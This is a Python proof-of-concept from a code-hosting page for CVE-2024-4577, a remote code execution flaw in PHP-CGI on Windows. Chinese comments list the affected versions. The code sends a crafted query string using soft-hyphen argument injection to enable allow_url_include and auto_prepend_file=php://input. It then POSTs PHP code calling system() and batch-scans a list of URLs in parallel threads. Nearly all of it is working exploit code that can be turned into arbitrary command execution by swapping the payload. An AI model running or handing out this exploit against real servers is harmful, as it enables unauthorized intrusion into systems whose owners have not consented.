-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE_2024_4577_POC.py
134 lines (105 loc) · 4.55 KB
/
CVE_2024_4577_POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
"""
* @author:程
* @DateTime:2024/7/27 16:55
"""
'''受影响版本
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29'''
'''漏洞分析
回顾CVE-2012-1823漏洞,该漏洞是用户将HTTP请求参数提交至Apache服务器,通过mod_cgi模块交给php-cgi处理,从漏洞补丁可以看出,
如果检测到字符串开头为"-"字符并且字符串不存在"="字符就设置skip_getopt = 1,
那么整个查询字符串将作为CGI的参数进行传递,攻击者可以向后端的php-cgi解析程序提交恶意数据,php-cgi会将恶意数据当做php参数直接执行。'''
import re
import requests
import socket
from concurrent.futures import ThreadPoolExecutor, as_completed
def get_host_from_url(url):
"""
从URL中提取主机名。
Args:
- url: 待提取主机名的URL
Returns:
- 主机名字符串
"""
try:
# 确保URL以 '/' 结尾
if not url.endswith('/'):
url += '/'
# 判断是提取 "//" 后面的内容还是 "/" 前面的内容
if url.startswith("http://") or url.startswith("https://"):
# 提取 "//" 后面的内容,直到遇到 ":" 或 "/"
match_after_double_slash = re.search(r'//([^:/]+)', url)
if match_after_double_slash:
return match_after_double_slash.group(1)
else:
# 提取 "/" 前面的内容
match_before_slash = re.search(r'^(.+?)/', url)
if match_before_slash:
return match_before_slash.group(1)
return None
except Exception as e:
print(f"无法解析主机名: {str(e)}")
return None
def CVE_2024_4577_test(url):
"""
检测CVE-2024-4577漏洞在给定URL上的存在性。
Args:
- url: 待检测的URL
Returns:
- 检测结果消息
"""
try:
host = get_host_from_url(url)
if not host:
return f"URL: {url} 无法解析主机名"
# HTTP请求头部
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0',
'Host': host
}
# 构造利用PHP-CGI漏洞的URI
uri = '/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
target_url = url + uri
# PHP代码,用于执行指定的 exec_command 命令
php_code = '<?php system("echo 1234567891011121214151617181920"); ?>'
# 发送POST请求,将PHP代码作为数据传递
response = requests.post(target_url, headers=headers, data=php_code)
# 输出响应内容
if response.status_code // 100 == 2 or response.status_code // 100 == 3:
if "1234567891011121214151617181920" in response.text:
return f"{url} 存在Windows平台PHP-CGI远程代码执行漏洞, 编号CVE_2024_4577"
else:
return f"{url} 未发现漏洞"
else:
return f"{url} 发送请求失败,状态码: {response.status_code}"
except Exception as e:
return f"{url} 发生异常: {str(e)}"
def batch_scan(file_path):
"""
批量扫描文件中的URL,检测CVE-2024-4577漏洞,并打印结果。
Args:
- file_path: 包含待检测URL的文件路径
"""
try:
with open(file_path, 'r') as file:
urls = file.readlines()
# 使用 ThreadPoolExecutor 进行多线程处理
with ThreadPoolExecutor(max_workers=10) as executor:
future_to_url = {executor.submit(CVE_2024_4577_test, url.strip()): url.strip() for url in urls}
for future in as_completed(future_to_url):
result = future.result()
# 打印每个检测的结果
print(result)
except FileNotFoundError:
print(f"文件 {file_path} 未找到")
except Exception as e:
print(f"发生异常: {str(e)}")
if __name__ == '__main__':
# 执行批量扫描
batch_scan('urls.txt')